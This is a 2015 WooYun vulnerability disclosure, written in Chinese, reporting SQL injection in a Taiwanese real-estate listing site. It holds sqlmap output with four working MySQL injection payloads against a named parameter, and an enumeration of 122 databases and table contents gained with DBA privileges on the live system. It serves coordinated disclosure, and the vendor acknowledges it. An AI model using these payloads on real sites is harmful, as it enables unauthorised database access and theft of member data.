当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0165298

漏洞标题:588集屋網存在SQL注入/122库/泄露会员的信息/DBA(臺灣地區)

相关厂商:588集屋網

漏洞作者: 路人甲

提交时间:2015-12-28 17:24

修复时间:2016-02-09 23:29

公开时间:2016-02-09 23:29

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-28: 细节已通知厂商并且等待厂商处理中
2015-12-28: 厂商已经确认,细节仅向厂商公开
2016-01-07: 细节向核心白帽子及相关领域专家公开
2016-01-17: 细节向普通白帽子公开
2016-01-27: 细节向实习白帽子公开
2016-02-09: 细节向公众公开

简要描述:

详细说明:

588集屋網:提供中部地區中古屋、預售屋、新成屋等買屋、賣屋、租屋仲介服務,不動產專業網站,提供大台中地區消費者與房地產界仲介,最佳的預售屋、中古屋、租屋完整資訊的專業網站,並且提供有關房地產相關訊息及報導。
注入点:http://**.**.**.**/information.php?InfoID=1963

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: InfoID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: InfoID=1963 AND 2308=2308
    Vector: AND [INFERENCE]
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: InfoID=1963 AND (SELECT 4968 FROM(SELECT COUNT(*),CONCAT(0x716b787171,(SELECT (ELT(4968=4968,1))),0x71786b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: InfoID=1963 AND (SELECT * FROM (SELECT(SLEEP(5)))HaCL)
    Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: InfoID=-5047 UNION ALL SELECT NULL,NULL,CONCAT(0x716b787171,0x576f455377564e745644,0x71786b7a71),NULL,NULL-- 
    Vector:  UNION ALL SELECT NULL,NULL,[QUERY],NULL,NULL-- 
---
web application technology: Apache 2.2.22, PHP 5.2.17
back-end DBMS: MySQL 5.0
current database:    'sosohouse_db'
current user is DBA:    True


available databases [122]:
[*] 3331688_db
[*] customer_db
[*] customer_eight
[*] customer_five_db
[*] customer_four_db
[*] customer_seven_db
[*] customer_six_db
[*] customer_thr_db
[*] customer_two_db
[*] dasiang_db
[*] dff888
[*] example_new_db
[*] heping_db
[*] information_schema
[*] jingtzang_db
[*] message
[*] mysql
[*] news_public
[*] okeyhouse_db
[*] online_test
[*] onlineabc
[*] onlineabc_bk
[*] onlinesalon
[*] phpmyadmin
[*] seafood88888_db
[*] shop_011
[*] shop_012
[*] sogo888
[*] sosohouse_db
[*] tea_db
[*] ultrax
[*] web100
[*] web101
[*] web102
[*] web104
[*] web105
[*] web106
[*] web107
[*] web108
[*] web109
[*] web110
[*] web112
[*] web113
[*] web114
[*] web115
[*] web116
[*] web117
[*] web119
[*] web120
[*] web122
[*] web123
[*] web126
[*] web129
[*] web130
[*] web131
[*] web131_cht
[*] web132
[*] web133
[*] web134
[*] web134b
[*] web135
[*] web136
[*] web137
[*] web138
[*] web139
[*] web14
[*] web140
[*] web141
[*] web143
[*] web147
[*] web147_en
[*] web148
[*] web149
[*] web149_cn
[*] web153
[*] web154
[*] web155
[*] web156
[*] web157
[*] web158
[*] web159
[*] web160
[*] web160_cht
[*] web161
[*] web162
[*] web163
[*] web164
[*] web165
[*] web166
[*] web167
[*] web168
[*] web169
[*] web170
[*] web171
[*] web18
[*] web29
[*] web30
[*] web32
[*] web37
[*] web38
[*] web39
[*] web41
[*] web43
[*] web45
[*] web46
[*] web47
[*] web49
[*] web50
[*] web52
[*] web54
[*] web55
[*] web58
[*] web58_en
[*] web59
[*] web61
[*] web62
[*] web63
[*] web64
[*] web96
[*] web97
[*] web98
[*] web99


当前数据库的表

Database: sosohouse_db
+-----------------+---------+
| Table           | Entries |
+-----------------+---------+
| webcount        | 294829  |
| articlereply    | 2848    |
| news            | 2215    |
| tbinfo          | 1948    |
| tbmid           | 1821    |
| uperdata        | 1458    |
| dfdmember       | 1400    |
| orderview       | 1398    |
| M1676           | 993     |
| member          | 958     |
| tbnew           | 727     |
| keyword_content | 450     |
| tbbuilder       | 383     |
| adpostx         | 291     |
| tbran           | 273     |
| vipdata         | 93      |
| googlesigh      | 87      |
| goodhouse       | 79      |
| problemreport   | 73      |
| adpost          | 70      |
| message         | 69      |
| tbrentad        | 69      |
| articlesubject  | 68      |
| matchsheet      | 55      |
| mover           | 41      |
| buyaad          | 38      |
| nameandlink     | 28      |
| googp           | 11      |
| vote            | 9       |
| keyword_table   | 7       |
| catalogs        | 6       |
| monthrecommend  | 6       |
| tbmidbt1        | 6       |
| vote_item       | 5       |
| dfd_mailto      | 4       |
| tbmidbt         | 4       |
| tbmidbt01       | 4       |
| tbmidbt02       | 4       |
| tbnew_hc        | 4       |
| tbnew_tp        | 4       |
| tbnew_tpc       | 4       |
| tbnewbt         | 4       |
| tbranbt         | 4       |
| tbranbt01       | 4       |
| tbranbt02       | 4       |
| admin_sheet     | 3       |
| discussion      | 3       |
| tbnew_hcc       | 3       |
| tbnew_tyc       | 3       |
| declaire        | 2       |
| tbbanner        | 2       |
| count_set       | 1       |
| rightsheet      | 1       |
| tbnew_mlc       | 1       |
| tbnew_tcc       | 1       |
| vote_title      | 1       |
+-----------------+---------+

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2015-12-28 18:11

厂商回复:

感謝通報

最新状态:

暂无